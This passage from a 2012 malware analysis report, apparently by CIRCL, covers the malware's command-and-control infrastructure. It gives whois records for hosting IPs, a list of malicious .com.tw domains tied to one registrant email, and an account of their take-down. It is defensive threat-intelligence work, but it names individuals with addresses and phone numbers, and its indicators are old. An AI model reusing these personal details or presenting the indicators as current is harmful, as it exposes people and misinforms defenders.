SC1450−AP e−mail : support@idc . cattelecom . com a d d re s s : CAT−IDC Data Comm. Dept . ( IDC ) a d d re s s : CAT Telecom P u b l i c Company Ltd, a d d re s s : 72 Charoenkrung Road Bangrak Bangkok THAILAND 10501 a d d re s s : 23 ----- phone : +66−2−6141240−3 fax _−no :_ +66−2−6142270 country : TH changed : suchok@bulbul . cat . net . th 20070719 mnt−by : MAINT−NEW source : APNIC person : CAT−IDC Spamming t r a c k i n g team nic −hdl : CS416−AP e−mail : abuse@idc . cattelecom . com a d d re s s : I n t e r n e t data c e n t e r department CAT Tower f l o o r 13 72 charenkrung Rd . Bangrak Bangkok phone : +66−210−41240 fax _−no :_ +66−210−41244 country : TH changed : suchok@bulbul . cat . net . th 20091211 mnt−by : MAINT−NEW source : APNIC masmitnd.com.tw (64.62.146.101) _•_ NetRange : 6 4 . 6 2 . 1 2 8 . 0 − 64. 62.2 55.2 55 CIDR : 64.62.128.0/17 OriginAS : AS6939 NetName : HURRICANE−4 NetHandle : NET−64−62−128−0−1 Parent : NET−64−0−0−0−0 NetType : D i r e c t A l l o c a t i o n Comment : ADDRESSES WITHIN THIS BLOCK ARE NON−PORTABLE RegDate : 2002−08−27 Updated : 2012−02−24 Ref : http :// whois . a r i n . net / r e s t / net /NET−64−62−128−0−1 OrgName : Hurricane E l e c t r i c, Inc . OrgId : HURC Address : 760 Mission Court City : Fremont StateProv : CA PostalCode : 94539 Country : US RegDate : Updated : 2011−04−13 Ref : http :// whois . a r i n . net / r e s t / org /HURC R e f e r r a l S e r v e r : rwhois :// rwhois . he . net :4321 OrgTechHandle : ZH17−ARIN OrgTechName : Hurricane E l e c t r i c OrgTechPhone : +1−510−580−4100 OrgTechEmail : hostmaster@he . net 24 ----- OrgTechRef : http :// whois . a r i n . net / r e s t /poc/ZH17−ARIN OrgAbuseHandle : ABUSE1036−ARIN OrgAbuseName : Abuse Department OrgAbusePhone : +1−510−580−4100 OrgAbuseEmail : abuse@he . net OrgAbuseRef : http :// whois . a r i n . net / r e s t /poc/ABUSE1036−ARIN RTechHandle : ZH17−ARIN RTechName : Hurricane E l e c t r i c RTechPhone : +1−510−580−4100 RTechEmail : hostmaster@he . net RTechRef : http :// whois . a r i n . net / r e s t /poc/ZH17−ARIN RNOCHandle : ZH17−ARIN RNOCName: Hurricane E l e c t r i c RNOCPhone : +1−510−580−4100 RNOCEmail : hostmaster@he . net RNOCRef : http :// whois . a r i n . net / r e s t /poc/ZH17−ARIN RAbuseHandle : ABUSE1036−ARIN RAbuseName : Abuse Department RAbusePhone : +1−510−580−4100 RAbuseEmail : abuse@he . net RAbuseRef : http :// whois . a r i n . net / r e s t /poc/ABUSE1036−ARIN financepfrro.com.tw (195.191.56.240) _•_ inetnum : 1 9 5 . 1 9 1 . 5 6 . 0 − 195.191.57.255 netname : AltNet _−UA_ d e s c r : PE Kolobov Aleksandr G r i g o r i e v i c h country : UA remarks : ############################################# remarks : ### Points of contact f o r One Host Hosting Center remarks : ### SPAM: abuse@onehost . com . ua remarks : ### Network s e c u r i t y i s s u e s : noc@onehost . com . ua remarks : ### Customer support : support@onehost . com . ua remarks : ############################################# org : ORG−IKAG2−RIPE admin−c : VMK19−RIPE tech _−c :_ VMK19−RIPE s t a t u s : ASSIGNED PI mnt−by : RIPE−NCC−END−MNT mnt−lower : RIPE−NCC−END−MNT mnt−by : AS50395−MNT mnt−r o u t e s : AS50395−MNT mnt−domains : AS50395−MNT source : RIPE # F i l t e r e d o r g a n i s a t i o n : ORG−IKAG2−RIPE org−name : IP Kolobov Aleksandr G r i g o r i e v i c h 25 ----- org−type : other a d d r e s s : 5uy K o t e l y n i c h e s k i y a l l e y 12, of . 14 mnt−r e f : NETASSIST−MNT mnt−by : NETASSIST−MNT source : RIPE # F i l t e r e d person : V a s i l i y M Kamenskiy a d d re s s : u l . P ro s p e rt Mira, 47 phone : +7 495 7832213 nic −hdl : VMK19−RIPE mnt−by : AS50395−MNT source : RIPE # F i l t e r e d % I n f o r m a t i o n r e l a t e d to ’195.191.56.0/23 AS50395 ’ route : 195.191.56.0/23 d e s c r : PPoE Network o r i g i n : AS50395 mnt−by : AS50395−MNT source : RIPE # F i l t e r e d 200.46.204.8 _•_ inetnum : 200.46.204.0/25 s t a t u s : r e a l l o c a t e d owner : HUB.ORG ownerid : PA−HUBO1−LACNIC r e s p o n s i b l e : Marc G. F o u r n i e r a d d re s s : 360 Main Street, S u i t e 21, 360, a d d re s s : 11111 − Panama − country : PA phone : +902 542 0713 [ ] owner−c : MGF tech _−c :_ MGF abuse _−c :_ MGF c r e a t e d : 20040129 changed : 20040129 inetnum−up : 200.46.192/20 nic −hdl : MGF person : Marc G. F o u r n i e r e−mail : scrappy@HUB .ORG a d d re s s : 360 Main Street, S u i t e 21, 360, a d d re s s : B4P1C4 − W o l f v i l l e − NS country : CA phone : +1 902 542 0713 [ ] c r e a t e d : 20031010 changed : 20031010 95.143.198.47 _•_ 26 ----- inetnum : 9 5 . 1 4 3 . 1 9 8 . 1 − 95.143.198.254 netname : s e r v e r c o n n e c t −cloud _−network_ d e s c r : Abuse−mailbox : abuse@serverconnect . se country : se admin−c : PF4155−RIPE tech _−c :_ PF4155−RIPE s t a t u s : ASSIGNED PA mnt−by : MNT−SERVERCONNECT source : RIPE # F i l t e r e d person : Peter Forslund a d d re s s : Hyggesvagen 1 phone : +46 650484444 nic −hdl : PF4155−RIPE source : RIPE # F i l t e r e d % I n f o r m a t i o n r e l a t e d to ’95.143.192.0/20 AS49770 ’ route : 95.143.192.0/20 d e s c r : S e rv a i n e t −BLK o r i g i n : AS49770 mnt−by : MNT−SERVERCONNECT source : RIPE # F i l t e r e d **F.** **Related domain information** These domains have been identified being registered using the same email address ’aster@gmail.com’. With a high probability, these are used with malicious intention. 46.102.232.171 maserluk . com . tw . TTL 600 46.102.232.171 p u z i l l o . com . tw . TTL 600 46.102.232.171 q u a n i t e r . com . tw . TTL 600 46.102.232.171 q v a z g l a s . com . tw . TTL 600 64 .62.1 46.1 00 asteronew . com . tw . TTL 600 64 .62.1 46.1 01 as−forum . com . tw . TTL 600 64 .62.1 46.1 01 hotmaking . com . tw . TTL 600 64 .62.1 46.1 01 MASMITND.COM.TW. TTL 600 66 .197. 144. 38 VKRMEK.COM.TW. TTL 600 79 .137. 214. 18 ABC−FORUM.COM.TW. TTL 600 79 .137. 214. 18 oberon323 . com . tw . TTL 600 79 .137. 214. 18 OREON3.COM.TW. TTL 600 79 .137. 214. 18 properdom . com . tw . TTL 600 79 .137. 214. 18 vnuess3 . com . tw . TTL 600 89 .201. 174. 51 gubkabob . com . tw . TTL 600 9 1 . 2 1 1 . 8 8 . 3 9 preon . com . tw . TTL 600 91 .215. 218. 79 guardalarms . com . TTL 600 91 .215. 218. 79 shambabu . com . tw . TTL 600 27 ----- 122.155.165.122 w e d n e s l t r . com . tw . TTL 600 188.247.135.77 NEWLIFEN .COM.TW. TTL 600 188.247.135.77 WEHAVECHANSE.COM.TW. TTL 600 194.219.29.152 metdoman . com . TTL 600 195.191.56.240 f i n a n c e p f r r o . com . tw . TTL 600 195.191.56.240 man−forum . com . tw . TTL 600 195.191.56.240 mastermi . com . tw . TTL 600 195.191.56.240 MASTERMI.COM.TW. TTL 600 195.191.56.240 mas te ro fo r . com . tw . TTL 600 195.191.56.240 membran . com . tw . TTL 600 203.150.230.31 c l o s u r e s o c k s . com . TTL 600 204.93.171.237 DIGMETACPAN.COM.TW. TTL 600 204.93.171.237 newgetp . com . tw . TTL 600 204.93.171.246 g o o d l o k i . com . tw . TTL 600 2 1 2 . 3 6 . 9 . 5 2 apocalp . com . tw . TTL 600 **G.** **Take-down** Based on a previous version of this report, CIRCL in collaboration with various registrars and/or hosters was able to take-down all the identified domains and several IP addresses. Taking down IP addresses or the associated computers unfortunately took much more time and the process is now completed as with the release date of this version of the report. _1._ _Registered domains_ CIRCL asked on July 27 2012 for the take-down of the ’.com.tw’ and ’.com’ domains. All ’.com.tw’ domains were suspended on August 08 2012. The ’.com’ domains were suspended on August 16 2012 _2._ _IP addresses_ Several of the IP addresses are no longer active, for instance the two hardcoded IP addresses (200.46.204.8, 95.143.198.47), but quite a few still are or are active again. Fortunately, the **examined malware mainly relies on DNS (except for the two hardcoded IP addresses)** **and the hardcoded IP addresses are no longer reachable.** 28 -----